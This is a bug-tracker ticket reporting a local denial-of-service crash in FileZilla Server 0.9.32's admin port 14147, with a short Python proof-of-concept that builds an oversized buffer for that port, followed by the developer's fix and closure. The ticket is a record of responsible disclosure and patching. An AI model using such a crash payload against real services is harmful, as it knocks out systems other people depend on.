Opened 15 years ago

Closed 12 years ago

#4693 closed Bug report (fixed)

FileZilla Server version 0.9.32 local denial of service

Reported by: Juan Pablo Lopez Yacubian Owned by:
Priority: critical Component: FileZilla Server
Keywords: crash, admin, 14147, fixed Cc:
Component version: Operating system type: Windows
Operating system version: XP SP3


Hello people

The problem is in a local port (14147) that "filezilla server" used for its interface.

If you send some data to this port, that is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crash.

I did some test with a debugger and i could not run code.. for me is only a denial of service, but is important repair it becuase this process run with the system privileges.

i wrote a poc in python for test

from socket import *

host = ""
port = 14147

data = "A" * 698000

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))

OS : Windows Xp SP3 - all patch

see you

Juan Pablo Lopez Yacubian

Attachments (1)

FileZilla Server.7z (242.5 KB ) - added by Tim Kosse 15 years ago.

Download all attachments as: .zip

Change History (3)

by Tim Kosse, 15 years ago

Attachment: FileZilla Server.7z added

comment:1 by Tim Kosse, 15 years ago

Priority: lowcritical
Status: newmoreinfo

Thanks for spotting this.

Please try the attached build of FileZilla Server.

comment:2 by Josh Davis, 12 years ago

Keywords: crash admin 14147 fixed added
Resolution: fixed
Status: moreinfoclosed

This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.

Note: See TracTickets for help on using tickets.